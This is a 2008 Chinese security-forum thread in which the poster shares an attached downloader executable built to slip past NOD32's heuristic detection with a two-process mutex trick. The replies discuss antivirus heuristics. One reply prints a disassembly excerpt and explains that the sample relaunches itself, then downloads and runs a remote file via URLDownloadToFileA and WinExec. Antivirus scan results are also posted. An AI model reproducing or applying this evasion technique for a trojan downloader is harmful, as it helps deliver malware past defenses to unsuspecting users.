‹‹ 上一主题 | 下一主题 ››
发新话题
打印

[原创]最简单的双进程对抗NOD32启发..

洋洋洒洒

荣誉会员

Rank: 6Rank: 6Rank: 6

帖子
61 
精华
0 
积分
242 
阅读权限
100 
性别
男 
在线时间
107 小时 
注册时间
2007-11-21 
最后登录
2008-5-13 
楼主 发表于 2008-4-19 17:06  只看该作者

[原创]最简单的双进程对抗NOD32启发..

信息来源:邪恶八进制信息安全团队(www.eviloctal.com
文章作者:洋洋洒洒

又拿最简单的下载者做演示.非常简单.
稍稍搞复杂点.估计就能过一片的"高级虚拟启发"等等吧.

附上EXE.代码直接看文件吧...

附件

1.rar (550 Bytes)

2008-4-19 17:06, 下载次数: 212

阿尔卑斯与八宝糖还有冷苹果

TOP

洋洋洒洒

荣誉会员

Rank: 6Rank: 6Rank: 6

帖子
61 
精华
0 
积分
242 
阅读权限
100 
性别
男 
在线时间
107 小时 
注册时间
2007-11-21 
最后登录
2008-5-13 
沙发 发表于 2008-4-19 17:10  只看该作者
仅仅说明杀毒软件查杀方式并不像广告里说的先进...
....一个几年前的东西就可以轻易过掉...传统特征码还是不能丢啊...XXXX好像就把特征码库丢了..
阿尔卑斯与八宝糖还有冷苹果

TOP

风泽

团队执行官

Rank: 8Rank: 8

E.S.T核心成员 CIO

帖子
439 
精华
26 
积分
6156 
阅读权限
200 
性别
男 
在线时间
978 小时 
注册时间
2004-7-6 
最后登录
2008-5-13 

原创技术奖 软件研发奖 核心建议奖 优秀管理奖

椅子 发表于 2008-4-19 17:21  只看该作者
过不了小红伞。。。一样是启发式滴~~说明小红伞比NOD32好多了。
NOD32没测试,装了一天就把它卸了,感觉太垃圾。

TOP

洋洋洒洒

荣誉会员

Rank: 6Rank: 6Rank: 6

帖子
61 
精华
0 
积分
242 
阅读权限
100 
性别
男 
在线时间
107 小时 
注册时间
2007-11-21 
最后登录
2008-5-13 
板凳 发表于 2008-4-19 17:38  只看该作者

回复 椅子 风泽 的帖子

小红伞和卡吧...都不厚道...
如果你程序体积很小.估计病毒特征加1
扫描导入表 有urldownload... 又加1
程序什么都不干 .. 接着加1
这些加加减减的不是虚拟执行启发...

小伞比NOD32...只是标准不同罢了...能力应该...

[ 本帖最后由 洋洋洒洒 于 2008-4-24 17:32 编辑 ]
阿尔卑斯与八宝糖还有冷苹果

TOP

7个b

晶莹剔透§烈日灼然

Rank: 1

帖子
26 
精华
0 
积分
93 
阅读权限
40 
在线时间
13 小时 
注册时间
2007-9-24 
最后登录
2008-4-26 
地板 发表于 2008-4-24 15:07  只看该作者
0040111F    57              push edi
00401120    57              push edi
00401121    FF15 98104000   call dword ptr ds:[<&KERNEL32.CreateMutexA>>; kernel32.CreateMutexA
00401127    FF15 A0104000   call dword ptr ds:[<&KERNEL32.GetLastError>>; ntdll.RtlGetLastWin32Error
0040112D    85C0            test eax,eax
0040112F    75 27           jnz short 1.00401158
00401131    B9 AC114000     mov ecx,1.004011AC
00401136    57              push edi
00401137    51              push ecx
00401138    68 04010000     push 104
0040113D    51              push ecx
0040113E    57              push edi
0040113F    FF15 A4104000   call dword ptr ds:[<&KERNEL32.GetModuleFile>; kernel32.GetModuleFileNameA
00401145    FF15 AC104000   call dword ptr ds:[<&KERNEL32.WinExec>]     ; kernel32.WinExec
0040114B    68 E8030000     push 3E8
00401150    FF15 A8104000   call dword ptr ds:[<&KERNEL32.Sleep>]       ; kernel32.Sleep
00401156    EB 4D           jmp short 1.004011A5

CreateMutexA函数创建名为Mutex_xyz_123的互斥标识...
1.如果不存在则通过GetModuleFile获取自身路径,WinExec运行之...
然后Sleep(1000),再跳去ExitProcess...
2.如果存在互斥标识,证明自身是安全的,用URLDownloadToFileA下载文件并用WinExec运行之..
不知有没有错...

TOP

洋洋洒洒

荣誉会员

Rank: 6Rank: 6Rank: 6

帖子
61 
精华
0 
积分
242 
阅读权限
100 
性别
男 
在线时间
107 小时 
注册时间
2007-11-21 
最后登录
2008-5-13 
6楼 发表于 2008-4-24 17:30  只看该作者

回复 地板 7个b 的帖子

引用:
CreateMutexA函数创建名为Mutex_xyz_123的互斥标识...
1.如果不存在则通过GetModuleFile获取自身路径,WinExec运行之...
然后Sleep(1000),再跳去ExitProcess...
2.如果存在互斥标识,证明自身是安全的,用URLDownloadToFileA下载文件并用WinExec运行之..
不知有没有错...
嗯.对
引用:
那里来的代码文件?
附近里面有文件......放od里就是了
阿尔卑斯与八宝糖还有冷苹果

TOP

dayang1718

晶莹剔透§烈日灼然

Rank: 1

帖子
75 
精华
0 
积分
256 
阅读权限
40 
性别
男 
来自
shandong 
在线时间
76 小时 
注册时间
2006-10-7 
最后登录
2008-5-13 
7楼 发表于 2008-4-30 10:17  只看该作者
2.如果存在互斥标识,证明自身是安全的,用URLDownloadToFileA下载文件并用WinExec运行之..
不知有没有错...
这样就不能防止程序同时多次运行了。
love hack

TOP

洋洋洒洒

荣誉会员

Rank: 6Rank: 6Rank: 6

帖子
61 
精华
0 
积分
242 
阅读权限
100 
性别
男 
在线时间
107 小时 
注册时间
2007-11-21 
最后登录
2008-5-13 
8楼 发表于 2008-4-30 11:34  只看该作者
你就在加句代码多判断一下吧..
阿尔卑斯与八宝糖还有冷苹果

TOP

amsco

晶莹剔透§烈日灼然

Rank: 1

帖子
精华
0 
积分
阅读权限
40 
性别
女 
在线时间
2 小时 
注册时间
2006-5-28 
最后登录
2008-5-4 
9楼 发表于 2008-5-4 17:50  只看该作者
如果本身存在NOD32特征吗的话就没效果了?

TOP

opsun

loading

晶莹剔透§烈日灼然

Rank: 1

帖子
16 
精华
0 
积分
48 
阅读权限
40 
性别
男 
在线时间
11 小时 
注册时间
2006-4-20 
最后登录
2008-5-12 
10楼 发表于 2008-5-7 12:31  只看该作者
反病毒引擎        版本        最后更新        扫描结果
AhnLab-V3        -        -        -
AntiVir        -        -        TR/Agent.939
Authentium        -        -        Possibly a new variant of W32/Downloader-Sml-based!Maximus
Avast        -        -        -
AVG        -        -        Downloader.Small.CGQ
BitDefender        -        -        Generic.Malware.dld!!.31030000
CAT-QuickHeal        -        -        TrojanDownloader.Tiny.aqb
ClamAV        -        -        Trojan.Tiny-4
DrWeb        -        -        Trojan.DownLoader.origin
eSafe        -        -        -
eTrust-Vet        -        -        Win32/VMalum.CRJA
Ewido        -        -        -
F-Prot        -        -        W32/Downloader-Sml-based!Maximus
F-Secure        -        -        W32/Downloader
FileAdvisor        -        -        -
Fortinet        -        -        -
Ikarus        -        -        Win32.SuspectCrc
Kaspersky        -        -        Trojan-Downloader.Win32.Tiny.aqb
McAfee        -        -        -
Microsoft        -        -        -
NOD32v2        -        -        -
Norman        -        -        W32/Agent.FICC
Panda        -        -        -
Prevx1        -        -        -
Rising        -        -        -
Sophos        -        -        Mal/Heuri-E
Sunbelt        -        -        -
Symantec        -        -        -
TheHacker        -        -        Trojan/Downloader.Tiny.aqb
VBA32        -        -        Trojan-Downloader.Win32.Tiny.aqb
VirusBuster        -        -        -
Webwasher-Gateway        -        -        Trojan.Agent.939

TOP

‹‹ 上一主题 | 下一主题 ››
发新话题